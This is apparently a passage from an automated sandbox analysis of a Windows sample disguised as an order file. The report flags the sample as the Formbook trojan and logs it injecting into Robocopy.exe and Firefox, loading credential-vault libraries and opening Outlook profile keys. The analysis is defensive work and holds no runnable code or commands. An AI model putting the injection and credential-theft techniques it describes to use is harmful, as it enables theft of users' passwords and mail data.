        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_35200E503_2_35200E50
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_35290EAD3_2_35290EAD
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351E1EB23_2_351E1EB2
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351D2EE83_2_351D2EE8
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_35299ED23_2_35299ED2
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_3529E9A63_2_3529E9A6
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351DE9A03_2_351DE9A0
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_352808353_2_35280835
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351E38003_2_351E3800
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_3529F8723_2_3529F872
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351E98703_2_351E9870
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351FB8703_2_351FB870
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351C68683_2_351C6868
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_352598B23_2_352598B2
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351F68823_2_351F6882
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_352978F33_2_352978F3
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 3_2_351E28C03_2_351E28C0
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04A004455_2_04A00445
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04ABF5C95_2_04ABF5C9
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04AB75C65_2_04AB75C6
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04ACA5265_2_04ACA526
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04A006805_2_04A00680
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04A736EC5_2_04A736EC
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04ABF6F65_2_04ABF6F6
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_049FC6E05_2_049FC6E0
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04A9D62C5_2_04A9D62C
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04A1C6005_2_04A1C600
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04A246705_2_04A24670
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04AAD6465_2_04AAD646
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04A027605_2_04A02760
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04A0A7605_2_04A0A760
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04AB67575_2_04AB6757
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_049F00A05_2_049F00A0
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04AB70F15_2_04AB70F1
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04A0B0D05_2_04A0B0D0
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04AAE0765_2_04AAE076
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04A1B1E05_2_04A1B1E0
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04A051C05_2_04A051C0
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_049EF1135_2_049EF113
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04A9D1305_2_04A9D130
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04AC010E5_2_04AC010E
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04A4717A5_2_04A4717A
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_049ED2EC5_2_049ED2EC
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_049F13805_2_049F1380
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04ABF3305_2_04ABF330
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04A0E3105_2_04A0E310
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04A99C985_2_04A99C98
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04A1FCE05_2_04A1FCE0
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04ACACEB5_2_04ACACEB
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04A18CDF5_2_04A18CDF
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04A0AC205_2_04A0AC20
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_049F0C125_2_049F0C12
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04A03C605_2_04A03C60
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04AB6C695_2_04AB6C69
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04ABEC605_2_04ABEC60
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04AAEC4C5_2_04AAEC4C
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04A12DB05_2_04A12DB0
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04A9FDF45_2_04A9FDF4
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04A09DD05_2_04A09DD0
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04ABFD275_2_04ABFD27
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_049FAD005_2_049FAD00
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04A00D695_2_04A00D69
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04AB7D4C5_2_04AB7D4C
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04AB0EAD5_2_04AB0EAD
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04A01EB25_2_04A01EB2
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_049F2EE85_2_049F2EE8
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04AB9ED25_2_04AB9ED2
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04AA0E6D5_2_04AA0E6D
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04A20E505_2_04A20E50
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04ABEFBF5_2_04ABEFBF
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04A06FE05_2_04A06FE0
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04AB1FC65_2_04AB1FC6
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04A0CF005_2_04A0CF00
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04ABFF635_2_04ABFF63
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04A798B25_2_04A798B2
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04A168825_2_04A16882
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04AB78F35_2_04AB78F3
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04A028C05_2_04A028C0
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04AA08355_2_04AA0835
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04A038005_2_04A03800
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04A098705_2_04A09870
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04A1B8705_2_04A1B870
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04ABF8725_2_04ABF872
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_049E68685_2_049E6868
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04ABE9A65_2_04ABE9A6
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_049FE9A05_2_049FE9A0
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04A1FAA05_2_04A1FAA0
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04ABFA895_2_04ABFA89
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04ABCA135_2_04ABCA13
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04ABEA5B5_2_04ABEA5B
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04A74BC05_2_04A74BC0
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04ABFB2E5_2_04ABFB2E
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04A00B105_2_04A00B10
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04D1EFDA5_2_04D1EFDA
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04D1E4245_2_04D1E424
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04D1E7BC5_2_04D1E7BC
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04D1D8285_2_04D1D828
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 5_2_04D1E3055_2_04D1E305
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: String function: 3525EF10 appears 95 times
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: String function: 351CB910 appears 227 times
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: String function: 3524E692 appears 77 times
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: String function: 35227BE4 appears 72 times
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: String function: 04A6E692 appears 84 times
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: String function: 04A47BE4 appears 87 times
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: String function: 04A7EF10 appears 105 times
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: String function: 04A35050 appears 35 times
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: String function: 049EB910 appears 266 times
        Source: IMG_00991ORDER_FILES.exe, 00000003.00000002.6853915425.000000000507A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamerobocopy.exej% vs IMG_00991ORDER_FILES.exe
        Source: IMG_00991ORDER_FILES.exe, 00000003.00000002.6864033040.0000000035470000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs IMG_00991ORDER_FILES.exe
        Source: IMG_00991ORDER_FILES.exe, 00000003.00000003.6754952143.0000000035121000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs IMG_00991ORDER_FILES.exe
        Source: IMG_00991ORDER_FILES.exe, 00000003.00000002.6864033040.00000000352CD000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs IMG_00991ORDER_FILES.exe
        Source: IMG_00991ORDER_FILES.exe, 00000003.00000003.6751963994.0000000034F6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs IMG_00991ORDER_FILES.exe
        Source: IMG_00991ORDER_FILES.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: 00000006.00000002.10861332855.0000000000A90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000005.00000002.10261487014.0000000004820000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000005.00000002.10261406795.00000000047D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000003.00000002.6863945298.0000000034E90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000004.00000002.10861889744.0000000002410000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000003.00000002.6864836258.00000000354F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/14@21/13
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 0_2_0040352F EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,LdrInitializeThunk,wsprintfW,GetFileAttributesW,DeleteFileW,LdrInitializeThunk,SetCurrentDirectoryW,LdrInitializeThunk,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040352F
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeFile created: C:\Users\user\AppData\Local\Temp\nss26EA.tmpJump to behavior
        Source: IMG_00991ORDER_FILES.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: IMG_00991ORDER_FILES.exeReversingLabs: Detection: 26%
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeFile read: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe "C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe"
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeProcess created: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe "C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe"
        Source: C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exeProcess created: C:\Windows\SysWOW64\Robocopy.exe "C:\Windows\SysWOW64\Robocopy.exe"
        Source: C:\Windows\SysWOW64\Robocopy.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeProcess created: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe "C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe"Jump to behavior
        Source: C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exeProcess created: C:\Windows\SysWOW64\Robocopy.exe "C:\Windows\SysWOW64\Robocopy.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\Robocopy.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeSection loaded: dwmapi.dllJump to behavior
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeSection loaded: oleacc.dllJump to behavior
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeSection loaded: shfolder.dllJump to behavior
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeSection loaded: riched20.dllJump to behavior
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeSection loaded: usp10.dllJump to behavior
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeSection loaded: msls31.dllJump to behavior
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeSection loaded: textinputframework.dllJump to behavior
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeSection loaded: textshaping.dllJump to behavior
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeSection loaded: wkscli.dllJump to behavior
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\SysWOW64\Robocopy.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Windows\SysWOW64\Robocopy.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Windows\SysWOW64\Robocopy.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\Robocopy.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\SysWOW64\Robocopy.exeSection loaded: ieframe.dllJump to behavior
        Source: C:\Windows\SysWOW64\Robocopy.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\SysWOW64\Robocopy.exeSection loaded: netapi32.dllJump to behavior
        Source: C:\Windows\SysWOW64\Robocopy.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\SysWOW64\Robocopy.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\SysWOW64\Robocopy.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\SysWOW64\Robocopy.exeSection loaded: wkscli.dllJump to behavior
        Source: C:\Windows\SysWOW64\Robocopy.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\SysWOW64\Robocopy.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\Robocopy.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\SysWOW64\Robocopy.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\SysWOW64\Robocopy.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\Robocopy.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\SysWOW64\Robocopy.exeSection loaded: mlang.dllJump to behavior
        Source: C:\Windows\SysWOW64\Robocopy.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\SysWOW64\Robocopy.exeSection loaded: winsqlite3.dllJump to behavior
        Source: C:\Windows\SysWOW64\Robocopy.exeSection loaded: vaultcli.dllJump to behavior
        Source: C:\Windows\SysWOW64\Robocopy.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\SysWOW64\Robocopy.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\Robocopy.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
        Source: C:\Windows\SysWOW64\Robocopy.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
        Source: IMG_00991ORDER_FILES.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: mshtml.pdb source: IMG_00991ORDER_FILES.exe, 00000003.00000001.6547753417.0000000000649000.00000020.00000001.01000000.0000000D.sdmp
        Source: Binary string: wntdll.pdbUGP source: IMG_00991ORDER_FILES.exe, 00000003.00000003.6754952143.0000000034FF4000.00000004.00000020.00020000.00000000.sdmp, IMG_00991ORDER_FILES.exe, 00000003.00000002.6864033040.00000000352CD000.00000040.00001000.00020000.00000000.sdmp, IMG_00991ORDER_FILES.exe, 00000003.00000003.6751963994.0000000034E4A000.00000004.00000020.00020000.00000000.sdmp, IMG_00991ORDER_FILES.exe, 00000003.00000002.6864033040.00000000351A0000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: IMG_00991ORDER_FILES.exe, IMG_00991ORDER_FILES.exe, 00000003.00000003.6754952143.0000000034FF4000.00000004.00000020.00020000.00000000.sdmp, IMG_00991ORDER_FILES.exe, 00000003.00000002.6864033040.00000000352CD000.00000040.00001000.00020000.00000000.sdmp, IMG_00991ORDER_FILES.exe, 00000003.00000003.6751963994.0000000034E4A000.00000004.00000020.00020000.00000000.sdmp, IMG_00991ORDER_FILES.exe, 00000003.00000002.6864033040.00000000351A0000.00000040.00001000.00020000.00000000.sdmp, Robocopy.exe
        Source: Binary string: mshtml.pdbUGP source: IMG_00991ORDER_FILES.exe, 00000003.00000001.6547753417.0000000000649000.00000020.00000001.01000000.0000000D.sdmp

        Data Obfuscation

        barindex
        Source: Yara matchFile source: 00000000.00000002.6646879264.00000000068C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
